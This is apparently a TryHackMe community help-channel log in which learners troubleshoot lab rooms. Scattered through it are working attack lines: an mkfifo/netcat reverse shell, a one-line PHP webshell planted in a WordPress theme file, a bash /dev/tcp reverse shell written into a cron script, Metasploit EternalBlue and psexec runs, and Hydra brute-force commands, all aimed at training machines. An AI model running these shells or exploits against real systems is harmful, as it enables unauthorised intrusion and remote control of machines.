#room-help

that is what you should have (please note that my IPs are not your IPs and i didn't used the same port as you)

again, it's bad file descriptor

rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | sh -i 2>&1 | nc 10.112.74.227 8081 >/tmp/f

use this

is your listener still active ?
run again
nc -lnvp 8081
on your attackbox

it worked!

nice !

ok, thanks a lot

not... if delay is working.

had you completed that task?

nope but when I check yt tutorial I see they inject through gold, country database instead of in login databases

idk why my method not work

I am in this room(https://tryhackme.com/room/azuresentinel-aoc2025-a7d3h9k0p2) and I am currently on Task 1. I am trying to use the usernames and passwords they provided to log into Microsoft azure to complete this room and two of the credentials I have tried so far dont work. Does anyone experience similar issues?

you will find some usernames and temporary access passwords in Task1, try them all.

I just tried them all ...and none of them worked

@analog heath Have you tried any of them?

in https://tryhackme.com/room/splunk101, its there a way to get the log file to Attackbox machine?

hi how did you get this resolved?

oh nevermind

How do i connect with RDP? Can't seem to be able to connect with the AttackHost

Attack Box*

Have you looked at Remmina?

It should be installed in the Attackbox

That's the APP I couldn't remember the name and i was looking through my previous courses. Thank you very much

Gave +1 Rep to @vagrant fern (current: #11 - 924)

hi

okay, looks like I'm getting somewhere. Has this "localhost" been mentioned in previous rooms before to connect to for RDP applications?

I believe it may have but I do not fully remember, I believe it depends on the path and what rooms you've completed

localhost is just essentially the server hosted from your computer (hence the "local" part)

tried, and reason maybe, another user had changed credentials or they are using it.

https://tryhackme.com/room/fileandhashthreatintel Theres an error on one of the questions, Even echo Ai bot is saying its an error.

Task 4: The payroll.pdf application seems to be masquerading as which known Windows file?

____. But when you put in the anwser that stats with s it says its not in english and wont accept it

Hello, can someone help me understand why is handler closing my connections? Currently doing last task of https://tryhackme.com/room/metasploitexploitation

but why generic/shell_reverse_tcp for listening?? make sure the payload in your handler matches the one in your ELF file.

and use exploit/multi/handler and set payload that you had set to create your ELF file.

Ah, there is an issue.. 😄

Thanks 😄

make sure payload matches exactly.

Can someone explain why type and more work in this room, while print doesn't appear to? https://tryhackme.com/room/windowscommandline

hi there! I am working on the lookup room. I find the right credentials, but for some reason the subdomain is not working. I am getting this error: "Error. Page cannot be displayed. Please contact your service provider for more details." I have my lookup.thm and <subdomain>.lookup.thm in my /etc/hosts...what can be the issue here?

which room?

lookup

I don't get it, when I run burp suite and proxy the website, it works...why is that?

however, I still don't see the contents of the website...it just removed the error message and I get 200 response

Can somebody help me with the Msfvenom Part of Metasploit Exploitation?
when trying to run the shell on target machine I always get "Segmentation fault (core dumped)"

Maybe it's similar to my problem, look a few messages up

I'm currently working on the MBR and GPT Analysis lab(https://tryhackme.com/room/mbrandgptanalysis), but is it possible to complete the exercises via RDP from my own Kali machine using a VPN connection?
The lab instructions state, “In case the VM is not visible, use the blue ‘Show Split View’ button at the top of the page. You can also connect to the machine via your own VPN-connected machine using the RDP credentials below,” but I can't establish an RDP connection because the machine and my VPN are on different network segments 🙁

Wdym different network segments

Have you tried connecting with RDP anyways

You are more likely to have a stable connection in the split screen tbh just make it it's own window and full screen

I guess using split-screen really is the way to go...
Thank you! I’ll try practicing that way.
(When I connect to THM via VPN from Kali, I’m assigned a 192.168.x.x IP address, but since the target machine’s IP is 10.y.y.y, that means I can’t connect to the target machine via RDP from my own VM (Kali). Is that right?)

Gave +1 Rep to @keen lagoon (current: #234 - 48)

that has nothing to do it

its fine to connect on something thats 10.x.x.x

its the same network just the subnet assignment is different

Has anyone completed AWS S3 - Attack and Defense room?

Hmm...
It’s a bit slow, which is a bit of a concern, but... I’ll put up with it.
Thank you so much for your kind response.
By the way, I’m using xfreerdp for RDP, but I can’t connect and the ping isn’t going through either 😭

Gave +1 Rep to @keen lagoon (current: #230 - 49)

it is likely a vpn issue rather than a connection issue then

and pings shouldnt work cause its windows

🫡

You can't ping the machine.

Thank you so much! I had completely forgotten about that.
I’m now doing the exercises directly without using RDP!
Thank you for checking that for me ❤️

Gave +1 Rep to @round jetty (current: #2 - 4009)

it helped a lot, thank you

Gave +1 Rep to @unique totem (current: #3706 - 1)

Hello

Need help with Email Spoof

hello i need hlep with detecting web shells task 5 my answers are showing up as incorrect even when i am entering the correct answers

Going over the Detecting AD Initial Access....it keeps telling me Splunk is not available yet for the past hour or so....anyone know any workarounds here?

Nmap it (crazy I know) but it may kickstart the webserver.

right...

I have no idea why the room "Water Bottle" is rated easy. I looked for hours to find a solution, the solution is not the obvious way either.

Han Solo had it right: "Never tell me the odds." and apparently, never look at the ratings either.

What answers do you believe are correct but aren't being accepted? Likely a small syntax issue. If you want to DM me I can provide guidance.

Hello , the recap option at the end of each module is not clickable by me though its shown there. Can anyone help?

Having an issue where starting a network and then starting the web-based attacker machine results in the attacker machine not having a network interface in the target network. Specifically, I am in the "CI/CD and Build Security" room and I do not have a network interface in the cicd network on my attacker box. Any ideas on what could be causing this? Thank you.

can someone explain the scoring for the water bottle room. the points seem extremely arbitrary as i finished it before all these other people and somehow they have more points than me. theres literally one question so how can it be possible to have more than one score tied to the outcome

first blood matters.

yeah but i finished before everyone and somehow have less points than them

hello, there's someone can help me quick?

room: metasploit exploitation

Can you describe the issue you are having?

If you can verify your account and post screenshots, that would be helpful

@shrewd escarp

task 5 : if i set payload to meterpreter, the exploit doesn't work

Can you share the command when you generated the exploit as well as the options you supplied on multi/handler?

sure, give me a min

i have this loop

How about your multi/handler?

Can you do show options and share the result? Common issue there is not setting the lhost where the reverse shell connection will be received

it is set

Is the lhost pointing to your tun0?

lhost is pointing to my target ip address

i'm in my THM AttackBox

rhost is the target, lhost is your attack machine IP

as the payload you are using is a reverse shell connection where your target is initiating communication to your attack machine

so it will be the same?

ok, maybe i do it... thanks for the support ❤️

Let me know if you manage to get it to work

Damianlovesmommy5 hack him

hack me?

No

in a machine called All in One (allinonemj) in tryhackme, there's a wordpress website, i entered the dashboard, and when i try to change the 404 page of the twentytwenty theme to add a php reverse shell, it says: Unable to communicate back with site to check for fatal errors, so the PHP change was reverted. You will need to upload your PHP file change by some other means, such as by using SFTP.

i used the pentest monkey php reverse shell

but when i try to update the file, it says: Unable to communicate back with site to check for fatal errors, so the PHP change was reverted. You will need to upload your PHP file change by some other means, such as by using SFTP.

any help please

Did you check that your target was still up?

yeah it's still up

it's still up

this is weird lol

all i did right is replace the hostname all-in-one.thm in the address bar with the given ip address of the target

and it worked

Hey

first use short webshells

or delete everything in 404.php, and add a single line comment then update it to check what's the issue.

if it is saved then, paste your php rev shell, but use AttackBox IP. because sometime ovpn IP are not able to listen for packets.

or try with other simple rev shells. also remove all comments to keep it short.

Hi

okay thanks a lot

Gave +1 Rep to @analog heath (current: #703 - 11)

that was very useful

i'll try to use a basic php rev shell

like this?? @analog heath

<?php system($_GET["cmd"]);?>

if its updated on 404.php, try run command and get a shell by url parameter URL/404.php?cmd=id.

and if this works, then problem is your machine is communicating in one way, so use attackbox. You can either get RCE from ?cmd= with other rev shell, or you can use pentest monkey php, make sure you listen on your attackbox and port are same for php rev shell.

@analog heath , I feel like using my own Kali VM with the THM VPN is better than using the AttackBox, cause it is laggy a little bit. what do you think?

Hi, I need help with Genymotion on Windows.

I installed VirtualBox and Genymotion successfully. Kali Linux works fine in VirtualBox.

But in Genymotion:

• Samsung Galaxy A14 device is not opening (black screen)
• I tried another device (Galaxy S4), it shows "android" boot screen but gets stuck and doesn’t load further

I already disabled Hyper-V using command:
bcdedit /set hypervisorlaunchtype off

Still facing issue.

Can someone help me fix this?

yeah, but if your tun0 ip is like 192.x.x.x maybe you will face issue in getting response from target, like while listening with nc, but works in many cases.

actually i too never use attackbox. only my own machine with my configured tools.

Hello I'm new

GUYS NEED A HACKER ILL PAY 100 DOLLARS I SWEAR ON MY LIFE

Does not sound legal.

This doesn't seem to pertain to any THM room?

My bad 😅 I thought this help channel was for general setup issues too.

Could you tell me where I can ask this kind of question?

Bruuh the OWASP room on cyber Sec 101 is kicking my ass so bad first and second task were good Task 3 🤦🏽‍♂️

Don't forget to google

You don't need to rely on just tryhackme resources

How to bypass .pdf upload and excuate .php reverse shell script. I tried double extensions, FuZZ extensions in burp, and lot but none of them worked.

‘preciate you🤝

Which room ?

Hi

i m stuck within SOC 1 learning path

Imagine a scenario where an employee was lured into running data stealer malware.

1. The SOC team received the "Connection to Redline Stealer C2" alert after 12 minutes.
2. One of the L1 analysts on shift moved the alert to In Progress 10 minutes later.
3. After 6 minutes, the alert was escalated to L2, who spent 35 minutes cleaning the malware.
   Provide the MTTD, MTTA, and MTTR via comma as your answer (e.g. 10,20,30).

it should be 12, 28/22,63 Minutes in total

but the check button response with incorrect

Which room exactly 🙂 ?

Hi i solved it with help in the general room. but the kind of maths it expected is not a kind of math how you do math as teached in school

but thank you dear communisian secret service guy

Run the second anomaly detection query (index=vpnlogs).
Which user suspiciously logged in at 3 AM?

Hey guys i need answer to this question in the Splunk : exploring spl's Anomaly detection module's last question.. please help

@round jetty@keen lagoon
I managed to solve the room, but I was still feeling a bit unsettled, so I installed Windows 11 Pro on a VM and tried RDP.
And to my surprise, it worked! I was able to connect by using the standard RDP from Windows instead of using Xfreerdp from Kali!

I’ve learned something new. Thank you for your help 🙂

Gave +1 Rep to @keen lagoon (current: #208 - 52)

Gave +1 Rep to @round jetty (current: #2 - 4014)

You should look in to Reminna for Kali, I prefer that over Xfreerdp

👀

I spell it wrong everytime.

Remmina.

@fast temple

So it works with a GUI, huh? Thanks a lot. I'm new to Linux, so I really appreciate the advice from an expert like you.

Gave +1 Rep to @round jetty (current: #2 - 4015)

It looks easy to use...

Straight forward and easy. 🙂

Remmina asks for a certificate to be accepted? Do I accept it? https://tryhackme.com/room/windowspowershell

Yes.

thank you. I also see the mistake I made of picking RDP instead of SSH.

I had this saved room https://tryhackme.com/room/apictffo, but there is no VM attached to deploy. I think it was removed and the room is no longer doable.

Update: seems the room is no longer public. I removed it from my save rooms.

~~This room referenced on THM blog (free course recommended content) has no content: https://tryhackme.com/room/corridor?ref=blog.tryhackme.com~~

I have a premium subscription and it's still presenting the same issue. I've tried resetting the AttackBox and the network, with no luck. I've also given it a couple of days before attempting again, and still the same issue where it says the password has expired. But it errors out when trying to reset the password...

What do you mean with no content?
I did the job right now and can confirm that the room works as expected.

Seems to work on mine though. Have you tried refreshing the page or checked if your browser has add-ins that may be suppressing content?

Hey guys, 'quick question'.

I got RCE on a Windows target via ?cmd= (PluXml on port 5000).
I can execute commands like whoami and dir, and I found the file:

C:\Users\banner\Desktop\user.txt

But when I try to read it using type through curl/Burp, I only get the HTML page response (no command output).

Seems like the command executes but the output is not visible.

Any idea how to properly retrieve file content in this situation?

can you dir /s? (if 1-word commands work, but not 2-word commands, it may be your encoding 😉 )

I have a trouble with "Love at First Breach 2026 - Advanced Track." In Task 4 St3alMyH34rt, I can't access via RDP, it always show STATUS_PASSWORD_EXPIRED. Is this normal?

I have problem start the exercise environment in room "Breaching Active Directory". The environment is keep starting up over 30 mins. Anyone can offer help ?

Yo

can anybody help me with the last part of "Have a Break" osint challenge?
I couldn't find the culprit's name.

Try to ask in #1489686534717308948 channel

thanks

Gave +1 Rep to @vagrant fern (current: #11 - 930)

Hi guys struggling with this.. can't for the life of me work it out using nano to edit "task3" found where it is but how do you edit the txt file in nano?

This one is a user error.

Is the machine you started the Attackbox (blue if I remember correctly) or the target VM (green Start Machine)?

Hi all, Im working on Azure: tapper. But the required login seems to have 2fa configured. Im I doing something wrong or does the Gumby user require a reset?

All sorted - i skipped a step unfortunately, Scrubz helped out

Hey 👋

I am having trouble with question 2 of Task 6 of this room (https://tryhackme.com/room/react2shellcve202555182)

What is the flag in /etc?

Seems that yesterday I had connection issues and some DOM elements where not loading, indeed, today I can load the full page and see the content.

I'm having a problem in my study lab; the screen keeps going black and I can't solve the exercises. Does anyone know what it is?

Which THM Rooms can help me prepare for the SANS SEC506 amd GCIH Cert

Haven't looked at the GCIH syllabus, but I would suggest checking tools mentioned in the material and doing a search on related rooms.

I got a tech problem in the Burp Suite: the basics room - I cant access the room site, im getting a connection error - any ideas?

could you send a pic?

\

i think i am not allowed

verify your account.

@indigo sluice

I am unable to find the specified file of a unknown one or Tryhackme's home directory for some reason, Can anyone suggest how to fix this

You're in the wrong machine dude.

i tried both the attackbox and linux vm

available

You're certainly in the wrong machine in that screenshot. 😄

yep

can you join the vc

No, I can't. 🙂

found the soluttion

thanks

btw its interesting that i used ls -all on whim but it works same as ls -la

Hi everyone 👋

I’m working on a TryHackMe Autopsy (forensics) room.

I need to find something inside "ConsoleHost_history.txt", but I’m stuck.

What I did:

• Navigated to Users → AppData → Roaming → Microsoft → Windows
• Used keyword search (consolehost / powershell)
• Opened Indexed Text but I can’t clearly see the command/flag

Am I looking in the wrong place or missing a step? 🙏

https://tryhackme.com/room/cicdandbuildsecurity <-- how will you got an access token in the real world if you have no access to the git account?

Got problem with owasp top 10 2025
AS06 insecure design

hi, is there something wrong with the "res" room ?
I had to check the writeup and the file with special permissions doesn't have such on my instances.

Is it available on mobile?

There's no THM app but nothing stops you from opening THM website in a browser

So how do you get on it? THM app

Via link it's the easiest
https://tryhackme.com/

👍 thank you

Yes, this is a known issue.

Hi everyone here please I’m new to this please I really want to learn cyber security please I’m crippled I need help

Is it a known fault with rooms just randomly showing nothing and no progress

Maybe you got logged out

hi guys

can anybody help me? im on https://tryhackme.com/room/shellsoverview and on the first question of task 8. why is my shell not responding?

i have set it to listen and then i inject through the browser but I can't execute any commands once it is connected

im going to try restarting the machine

yeah im right just needed to restart

Chat me up I can help with some basic and some PDF that will show u the road

Hi

Good morning

could eney one help me in coding bcs i am new here

Hi guys, I am new to cybersecurity. I am having issues with consistency, is there a specific method that someone has that has worked well for them?

Just do one challenge/walkthrough per day, don't compare yourself to others and have a specific time slot to do the training. Also consider these challenges as a training for your brain and IQ not only for a job; that would help you hopefully to stay consistent.

How many other users are there it may be found in another user

hello

I need help

yes

My old account got hacked in 2023 on my 12th birthday when I was 12 now I’m Turning 15 on April 15th I asked other people can they help me get it back but I don’t have any money

Maybe raise a support ticket?

hi guys in valenfind room have a really big rabbit and idk know can we avoid that https://tryhackme.com/room/lafb2026e10

the thing is when I found LFI vul I brute force and get /root/.bash_history (kinda red flag)

and the thing is when I check deeper its turn out to be a backdoor

this one maybe credential for that backdoor

Description=Badr Service
Wants=network-online.target
After=network-online.target

[Service]
Type=simple
ExecStartPre=/bin/chmod +x /etc/badr/badr
ExecStart=/etc/badr/badr --config /etc/badr/rules.yaml --config /etc/badr/room.config.yaml > /var/log/badr.log 2>&1
ExecStartPost=/bin/bash -c 'sleep 10 && rm -f /etc/badr/badr /etc/badr/config.yaml /etc/badr/rules.yaml /etc/badr/room.config.yaml'
TimeoutSec=60
Restart=on-failure

[Install]
WantedBy=multi-user.target
```this is service I found

but turns out we dont need all of these to actually finish the room:(( (rip my time)

can i get help with room Metasploit: Exploitation task 6 i been stuck on it for a while and i follow it and make the elf file get it onto murphy machine run it but the handler on metasploit keeps terminating (time out)connection and murphy machine resets everytime i tab back to it

Yea I was stuck on it too back when I did it
I think it’s Tryhackme infra misconfiguration or something
Cause even on YouTube tutorials, their machine didn’t terminate or timed out but mine kept on terminating and failing to make the connection

I would suggest you to ssh into the target machine from your local machine to avoid it getting refreshed each time since the refresh happens when you change tabs or etc. It did not happen in my local machine.

Also make sure to first run the handler which listens for connections and then run the program on the target machine. If it does not work at first try, maybe do it 3 times.

how would i do that. with a kali?

ive been using the built in stuff with the vpn set up

If you set up the openvpn configuration, you can ssh into thm's machines from your local machine

It can be done from terminal of any Linux distribution, and probably windows

You can also ssh to it from the attackbox, but you will need 2 open terminal pages, 1 for the handler and other to run elf file

like two sepearte tabs? also is there material i can follow to ssh from my own machine or what i can use or does powershell or cmd?

Dm me pls, I will try to answer in detail

Hey, is anyone else having issues with the "Bypassing Server-Side Filtering" tasks in the Upload Vulnerabilities room? I got to the file upload step in both tasks, but it wouldn’t let me upload the file at all..

yea i,m still having issues

Locate the process that is running on the deployed instance (10.66.144.246). What flag is given?

_ _ {______}

i am stuck here not sure what to do...this is under linux fundamentals part 3. Under hint they say use ps aux to list all the processes we are looking for process that "seems out of ordinary"...someone please help? thank you

Hello, Im experiencing this one over and over and over, this time in SQLMap: The Basics. "practical task" section. The VM's interface doesn't open. I just get an information that the machine is running, while I should have both VM and attackbox interfaces. What can I do to fix it?

have you tried pressing top left "start attackbox"

For some rooms you don't need to have gui access to the target VM

you've connect vpn i guess, because this room doen't need split view or VM

I have no problem with attackbox, it runs fine, I just can't open VM

hmmm ok

if the attack box opens you should see the split view ?

you attack the target via the attack box

ok

I thought I need both interfaces

no sir

no just access the app from attackbox

kewl, I will, thanks for the advice

Gave +1 Rep to @olive hawk (current: #1824 - 3)

there is an issue on the cupidbot room https://tryhackme.com/room/lafb2026e6 , the chatbot is not responding

one of the processes contain the flag

you can try ps aux | grep THM

hi, im stuck at the room metasploitexploitation task 5. i can't get any connection with the right SMB login. I tried several other methods but no success.

could you send me the output what are you facing?

using msf?

yes i'm using msf, first i tried first the same as in the pictures:

RHOST => 10.113.164.8
msf6 exploit(windows/smb/ms17_010_eternalblue) > set SMBUser penny
SMBUser => penny
msf6 exploit(windows/smb/ms17_010_eternalblue) > set SMBPass leo1234
SMBPass => leo1234
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit
[*] Started reverse TCP handler on 10.113.111.109:4444 
[*] 10.113.164.8:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[-] 10.113.164.8:445      - An SMB Login Error occurred while connecting to the IPC$ tree.
[*] 10.113.164.8:445      - Scanned 1 of 1 hosts (100% complete)
[-] 10.113.164.8:445 - The target is not vulnerable.
[*] Exploit completed, but no session was created.```

then i tried using what AI told me to in the site:
```exploit(windows/smb/psexec) > set RHOST 10.113.164.8
RHOST => 10.113.164.8
msf6 exploit(windows/smb/psexec) > set SMBUser penny
SMBUser => penny
msf6 exploit(windows/smb/psexec) > set SMBPass leo1234
SMBPass => leo1234
msf6 exploit(windows/smb/psexec) > exploit
[*] Started reverse TCP handler on 10.113.111.109:4444 
[*] 10.113.164.8:445 - Connecting to the server...
[*] 10.113.164.8:445 - Authenticating to 10.113.164.8:445 as user 'penny'...
[-] 10.113.164.8:445 - Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: (0xc000006d) STATUS_LOGON_FAILURE: The attempted logon is invalid. This is either due to a bad username or authentication information.
[*] Exploit completed, but no session was created.```

i'm sure that that's the account to use too double checked

hey there!

are you using attackbox or your own machine?

attackbox

and you have to exploit eternalblue i think, right?

search for ms17 eternalblue and use it, and set payload to reverse shell tcp

also, @humble perch , don't need to specify creds and pass.

just set RHOSTS and run it.

or if it gets failed, check for nmap scan.

yea did that and its the same port 445 that's open but this is the message:

[*] 10.113.164.8:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[-] 10.113.164.8:445      - An SMB Login Error occurred while connecting to the IPC$ tree.
[*] 10.113.164.8:445      - Scanned 1 of 1 hosts (100% complete)
[-] 10.113.164.8:445 - The target is not vulnerable.
[*] Exploit completed, but no session was created.```

use eternalblue,don't smb_ms17

its ms17_010_eternalblue

also you can use meterpreter rev tcp as payload for better.

didn't copy everything but i'm using windows/smb/ms17_010_eternalblue

means you want to exploit that target with another way of your choice? instead of using basic eternalblue?

no but if i select payload 3 to get generic/shell_reverse_tcp like in the pictures then add the RHOST the message stays the same

as you had already set SMBpass and username, that is not needed for this.

see follow instructions.

exit msf, and rerun, sudo msfconsole -q

then search ms17_010_eternalblue and then use it.

ok i'll try

then select meterpreter paylaod, it would be better than shell rev.

search payloads see for x64/meterpreter/rev_shell_tcp like, and set payload <n>

lol it works thnx @analog heath

Hi, can anyone help me with the Metasploit: Exploitation room. I am really not sure what I am doing wrong, but cant progress till I gain access to the target machine. I also tried the instructions above but no luck.

leave the user and password blank

don't specify SMBpas and user

^ I did this and still same result. is there anything else I am doing wrong.

quite msf and rerun.

i did that as well, should I just end the attack box and relaunch it

@spark osprey try again, use eternalblue exploit, and set meterpreter payload, and set the RHOSTS and then exploit no more things needed.

^will try again

just do in this manner, don't set SMBuser or pass

what payload should I use as I have used both 3 and 31?

meterpreter rev tcp.

still not working, I am going to try restarting the attack Box and if that doesn't work I will come back to the room another day.

wait last try, reset the target machine, and just set new RHOSTS as target IP appears.

if still issue persists, then you may do it later.

ok i reset the attack box already, i will reset the target machine as well

after a new IP, set RHOSTS <target IP> and also wait till the target machine fully get started.

after getting IP, wait for 2 minute, then exploit, let the machine start fully.

I am not sure it is working for me, or what i might have done for it not to work, both attack box and the target machine have just been restarted

thank you for all your help, I am hoping it will work tomorrow.

the fact your output says machine not vulnerable suggests you may be targeting wrong machine (there are 3 in that room) the one you need is under Task 5 - your options settings all look correct. This exploit sometimes takes multiple tries and seems to stop working if target is hammered too many times - fresh start is best

Task 5
Exploitation

Press the Start Machine button below.


Start Machine
As the name suggests, Metasploit is an exploitation framework. Exploits are the most populated module category.

thank you, I will try rerunning again

Gave +1 Rep to @slim bison (current: #537 - 15)

Thank you it worked after a full reset

is it possible to get away from insta suspension these idiots they suspended my acc for no reason i appealed for it tho but still denied n now they're going to permenantly delete it

hey folks who i need to speak regarding making it public a room i created long time ago

Annoncement! Guys Ukraine just hacked a weapon factory in russia more info will soon be shared

your persistence will take you far -- cyber is 90% troubleshooting;)

did anyone try the intruder lab burp suite from jr pentester path

yes 4 yrs ago, please describe your issue so others can help, screenshots and/or terminal output showing commands and error messages go a long way to help.

hello , i'm having some trouble with evil-gpt machine , i have waited 15 min after the start-up but i don't get answer when i ask something

Thank god, I downloaded their zip , used their intruder , against usernames / passwords , but the lengths are the same, and even manually entering the passwords & usernames don’t work

pitchfork attack specifically

Task 10

dont worry about it solved it after 100 attempts (key lesson never give up)

and reset the box lol

already 3 reset holy moly

very good - did you determine the issue?

The lab itself had some issues , had to restart the box multiple times

Thanks for asking

happy hacking - also Caido and Turbo-Intruder are great options to work arounf the rate-limiting built into Burp Communiity

Yes it def was rate limiting causing me not to show the lengths of the pitchfork attack. Thank you for your advice

( not the length I was looking for )

These aren't the droids you're looking for -- Obi-One

What does that mean?

Star Wars https://youtu.be/9QVznazPjBc?si=TQmWADRxsAHQPSuu&t=105

bet

So i am working on the metasploit: exploitation room task 6, but when i load the target machine it says home/murphy doesn't exist, i have restarted the machine a few times but no change, any ideas? i can do the reverse shell, but when i go digging through the machine it doesnt have anything in it. i have gone to youtube to try a walkthrough.

Ain't it /home/murphy?

yes, i was pulling it from memory, but its saying it doesn't exist in the initialization of the target machine

So, you can't log in as murphy into the box?

$ Last login: Thu Aug 12 10:40:54 2021 from 10.9.6.195
Could not chdir to home directory /home/murphy: No such file or directory-sh: 2: Could: not found

that is the message i get when i start the machine, i can login as murphy then the only thing in the directory is ubuntu

I'm working in room "Intro to Log Analysis, Task 4, the hyperlink to the github XSS payload list is returning a 404 error.

But, you don't have to use /home/murphy

You can use /tmp for example

Or just switch to root and use /root

Seems like the owner took down a repo - THM is not responsible for external links and whether they are up or not

But this resource is pretty similar to what that taken down was so check it out
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/XSS Injection/README.md

i figured out what i was doing wrong trying to get the password hash, thanks for the help

Gave +1 Rep to @ashen crane (current: #50 - 231)

@ashen crane appreciate you thanks!

Gave +1 Rep to @ashen crane (current: #50 - 232)

Hi..Ad authenticated enumeration room ,the bloodhound login is giving expiry page after first login I change it but then the bloodhound stops working..

Since the machine access to where blood hound is installed is not accessible,what can I do here?

Kindly help

i am in similiar situation. "Echo" (the site chatbot) hinted that site html body section has the clue. have't figured out anything leading to the flag yet. still continue my 3rd day in a row effort.

In the SOC Level 1 reporting, in the subsection Escalation guide. I could not find answers for last 2 questions. what to do? I could not even understand which task they are talking about. Can anyone help?

#start-here Use any Text Editor and edit the content of the read_secret.sh. Inside that file, write a script to read the contents of secret.txt. What is inside secret.txt?

-rwxr-sr-x 1 root perm : read_secret.sh
-rw-r----- 1 root perm : secret.txt
how to change permission?
i use sudo need password but shows student is not sudoers file

please someone help me

Hello, I am very grateful to thm for the provided training courses and interesting examples

I encountered a problem in the room tryhackme.com/room/metasploitintro

Here's the thing: I'm solving this module via an OpenVPN connection from my Kali Linux, and the last step in the room, specifically exploiting the vulnerability, isn't working. Metasploit says the host is simply immune to this vulnerability.

msf exploit(windows/smb/ms17_010_eternalblue) > exploit
[] Started reverse TCP handler on 192.168.52.128:4444
[] 10.65.157.42:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[-] 10.65.157.42:445 - An SMB Login Error occurred while connecting to the IPC$ tree.
[] 10.65.157.42:445 - Scanned 1 of 1 hosts (100% complete)
[-] 10.65.157.42:445 - The target is not vulnerable.
[] Exploit completed, but no session was created.

I repeated these steps on attackbox, and everything worked there. What could be wrong? And how should I solve these tasks in my situation?

same thing, i guess

not same exactly, maybe someone have same problem = working MS from linux on openvpn

are you solving blue? if yes, this happened with me too check the lhost, maybe redownload VPN and restart the machine

im tried solving blue, but i dont get what they want, so I decided to first go through the Metasploit-rooms.

I suspected the problem was with lhost. Can you tell me which subnet you set the address from? 10.0? or 192

http://prntscr.com/JwXu1KLlS0NW

http://prntscr.com/I7NwFl5PdxPC

lhost should be your tun0 ip,
type ifconfig and use the ip that is shown in tun0

tun0: flags=209<UP,POINTOPOINT,RUNNING,NOARP> mtu 1380
inet 192.168.194.213

http://prntscr.com/9VyNX_EsMOBR

same thing

the target seems not vulnerable, there must another way

You'll need to verify your account to post screenshots or images as not all folks would want to click on a link shared by a stranger from the internet

@unique gyro

Hi so im on File Inclusion on task 5 last question
(Try out Lab #6 and read /etc/os-release. What is the VERSION_ID value?)
so i know lab 6 needs THM-profile to work so my command is
THM-profile/etc/os-release and i get no Version ID ive tried including ./.././ same problem anyone know the issue?

Did you restart the target after trying the attack on the Attackbox?

Check the page again, it should show you the current directory where the THM-profile folder is.

Warning: include(THM-profile/etc/os-release) [function.include]: failed to open stream: No such file or directory in /var/www/html/lab6.php on line 34

Warning: include() [function.include]: Failed opening 'THM-profile/etc/os-release' for inclusion (include_path='.:/usr/lib/php5.2/lib/php') in /var/www/html/lab6.php on line 34

those are the warnings i get

the only thing i can think of is
(include_path='.:/usr/lib/php5.2/lib/php') in /var/www/html/lab6.php on line 34
but im unsure of where that goes in

Look at your first warninf. It should give you the answer you need.

so there isnt a file directory like that which makes me confused? because i tried just the typical /etc/os-release and the error i got was to include THM-profile

Where is the folder THM-profile located?

im not sure the only thing i can think of is var/www/html/lab6.php but i dont think thats right either cause i tried that

i might just be abit stupid today😂

hey guys, i have a doubt about the certifications exam.. if i do it 1 section, i can stop and do it the next on other day ? or the 24h will count ? even if i did only 1 and stop

Vulnerabilities 101 Room, Task 4: Using NVD (opens in new tab), how many CVEs were published in July 2021?

I filtered the published date from 07/01/2021 to 07/31/2021 and got 1585 results, which the room is telling me is incorrect. The correct answer was 1554. Are my filters off? Why am I getting a different answer?

filter mistake.

What is wrong with it? I can't seem to figure out the mistake

could you send me a picture of your filters?

click advanced option and send me

there's also asked to filter for only published ones.

you may not configured that.

Yeah that was the issue

Hi! Why this answer is not working on room Snapped Phish-ing Line Task 3. Been stock for 5 hours

hxxp[://]kennaroads[.]buzz/data/Update365/office365/40e7baa2f826a57fcf04e5202526f8bd/?email=zoe[.]duncan@swiftspend[.]finance&error

Hiii

is this the room, cause there is only Task 1 with multiple q's https://tryhackme.com/room/snappedphishingline

Yes, This is the room.

read q3 carefully - it only asks for the root domain No need to defang. Hint: the * are placeholders for the char count of the correct answer in all lab answer fields on the platform.

Okay got it thank you!

Gave +1 Rep to @slim bison (current: #506 - 16)

5 hrs? Take a break man! Your future self will thank u;)

Yes, I might need it. Thank you

I'm having the same problem. Any solutions?

Exploiting Vulnerabilities Task 5 - Practical: Manual Exploitation

Struggling with finding an exploit for the apache server running. I went to exploit-db to find an exploit for RCE and none of them are working. There were about 3 or 4 of them and they each have errors that I can't seem to fix. I don't want the answer, I want to understand how to do this

EDIT: Figured it out. I was trying to exploit an Apache server when I needed to instead exploit Online Book Store. Found an RCE download and got it

Doing room: Regular Expressions, Task 5. Completely stumped on this one: Match all lines that start with $, followed by any single digit,
followed by $, followed by one or more non-whitespace characters

I've been doing ^$\d\S+ feel like this should be the answer but don't understand why it's not

Hi. Is there a problem with the windows machine provided in the winadbasics room? I'm unable to complete Task 6. I can't see local policies under the security settings of group policy management editor for a newly added group policy object.

i got stuck on the Hydra room, but the problem seems to be like hydra isn't working properly.

If somebody can help

What specifically isn't working?

when i run the command for the web login form, with hydra, it gives me 16 passwords found. Every one of them is wrong - i double checked everything, and finally went to the video and i did exactly like did in the video and its the same 16 passwords

but the 2nd question

the second command with ssh

went perfectly

what is the command you are running?

hydra -l molly -P /usr/share/wordlists/rockyou.txt 10.82.188.103 http-post-form "/login:username=^USER^&password=^PASS^:Incorrect login details."

ok hang on it's running on the attackbox

i send u sc on dm so u can see

i struggle in archangel room, it seems crontab is not working, is it possible?

room/wiresharkpacketoperations, Task 2, Question: "How many bytes (k) were transferred from the "Micro-St" MAC address?" In Wireshark, the line is: Packets: 10478 Bytes: 7474 Tx Packets 4294 Tx Bytes: 1083 Rx Packets 6184 Rx Bytes: 6390 My Answer was 1083 Bytes, because of "transmited" bytes "from"..... The correct answert is 7474 k? But this include received data?

It is possible one of your parameters is incorrect

What step is exactly not working?

I rewrite content of file helloworld.sh to get shell with archangel user, and it should run every minute, but no connection comes, only if i run it manually like ./helloworld.sh, but it gets me only www-data shell of course... so cronjob is not running if it is possible... or i have no idea what is going wrong, i also looked already on some walkthrough and i am doing it the same way, but not working for me

What does your payload look like though?

echo 'bash -i >& /dev/tcp/IP/8080 0>&1' > /opt/helloworld.sh

and i checked it by 'cat' command and as I said it is working when i run it manually

Hi everyone,
I am having a problem with the "Windows Event Logs" room, Task 2, Question 3:
